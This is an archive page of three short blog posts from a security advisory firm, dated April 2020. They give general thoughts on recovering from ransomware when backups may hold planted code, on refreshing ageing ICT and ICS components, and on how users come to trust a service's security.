April 2020 – The SECOND Advisories Limited

Recovery

27th April 202027th April 2020 By cliangNo Comments

We heard a lot to have frequent backup as mitigation measure to recover system from attack, most likely from ransomware. While periodic backup is important, the hard part is when do we know if the recovered system still carried the malicious codes that threat actor has planted? That said, the backup has already included the persistent threat. This is complex and situation specific. Some thoughts can be considered: Have digital forensic expert to examine the infected system, understand the attack path and the trigger for malicious codes, revalidate these behaviors after complete system recovery before back to businessSegregate contents from codes; so that a clean system can be built. The challenges are the configuration and data connector; whether persistent threat is stored as data (usually in external supplied content like readers' comment) There is no bullet proof solution but to maintain a hygiene information processing environment in reducing the likelihood: Adopt SecDevOps to address weakness during development and subsequent operationsConduct periodic holistic cybersecurity assessment...

Life Cycle Management #2

16th April 202016th April 2020 By cliangNo Comments

Like in physical world, automation components do have life time. Example is mechanical attributes of traditional hard disk drive, they are also subject to wear-and-tear during operating life. Storage technology now uses solid state without mechanical portion, we must not forget the underlying platform and applications. Apparently they won't have wear-and-tear operating condition, but the advancement of technology adoption will introduce obsolescence of the platform and applications. From vendors perspective, they will retire products not longer fit for purposes in the market and therefore drop resources to support. Hence, even if your automation components are still operating with minimal wear and tear condition, these components will still need to be refreshed for new version, bugs / vulnerabilities fixed, continuous vendor support in order to maintain the business outcome. Proper life cycle management of the ICT/ICS components cannot be overlooked. ...

Sense of Security

6th April 20206th April 2020 By cliangNo Comments

This is largely based on preception and trust. How do I trust if the infrastructure or system is secure? We need to look at these core elements: Any regulatory mandate in this industry sector? Pick public transportation as example, mandatory insurance coverage, regular inspection for license renewal, periodic operator training, compliance with safety regulations etc.How well is the service provider doing among peers? Let's say, the type and severity or incidents of this provider in past years among others, rating from customer reviews and comments.How does the service provider demonstrate what has been done to secure? Common examples are personal data handling transparency via the published privacy policy, alert end user on login from other rare locations, security tips in their official portal, committed service level pledge. All the above are applied in both the physical and cyber worlds. ...